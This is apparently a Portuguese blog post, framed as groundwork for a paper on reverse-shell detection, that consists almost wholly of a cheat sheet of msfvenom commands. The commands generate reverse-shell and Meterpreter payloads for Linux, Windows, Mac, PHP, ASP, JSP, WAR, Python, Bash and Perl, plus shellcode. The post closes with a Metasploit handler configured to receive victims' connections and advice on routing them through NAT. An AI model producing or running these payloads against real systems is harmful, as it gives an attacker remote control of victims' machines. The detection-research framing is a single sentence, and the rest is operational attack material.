Estou fazendo um artigo científico de detecção de shell reverso sobre os payload’s criados pelo KALI / Metasploit. Para tanto preciso primeiro criar estes malware’s. Este artigo visa apenas registrar o processo de criação de payload’s do MSFVenom para diversos sistemas como Windows, Linux, Mac e outros.
Os comandos são bem simples, LPORT e LHOST são a porta e IP do atacante que receberão o shell reverso. Por exemplo se for numa rede local você usará por exemplo 192.168.1.40 se for numa máquina de cara para internet você deverá usar seu IP público. É possível receber um shell reverso numa rede NATeada mas é necessário fazer o redirecionamento do IP público para o IP de intranet.
Listar os Payload’s
msfvenom -l |
Tipos de Binários
Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<SEU IP> LPORT=<SUA PORTA> -f elf > shell.elf |
Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<SEU IP> LPORT=<Sua Porta> -f exe > shell.exe |
Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Seu IP> LPORT=<Sua Porta> -f macho > shell.macho |
Payload’s para servidores WEB
PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Seu IP> LPORT=<Sua Porta> -f raw > shell.php cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php |
ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Seu IP> LPORT=<Sua Porta> -f asp > shell.asp |
JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Seu IP> LPORT=<Sua Porta> -f raw > shell.jsp |
WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Seu IP> LPORT=<Sua Porta> -f war > shell.war |
Payload’s Adicionais
Python
msfvenom -p cmd/unix/reverse_python LHOST=<Seu IP> LPORT=<Sua Porta> -f raw > shell.py |
Bash
msfvenom -p cmd/unix/reverse_bash LHOST=<Seu IP> LPORT=<Sua Porta> -f raw > shell.sh |
Perl
msfvenom -p cmd/unix/reverse_perl LHOST=<Seu IP> LPORT=<Sua Porta> -f raw > shell.pl |
Shellcode
For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.
Linux Based Shellcode
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language> |
Windows Based Shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language> |
Mac Based Shellcode
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language> |
Handlers
Os Handlers colocam o metasploit na posição de receber as conexões reversas, ou seja, escutar o chamados das vítimas.
use exploit/multi/handler set PAYLOAD <Payload name> set LHOST <LHOST> set LPORT <LPORT> set ExitOnSession false exploit -j -z
Agradeço a todos pela atenção e leitura.
Fonte: https://netsec.ws/?p=331
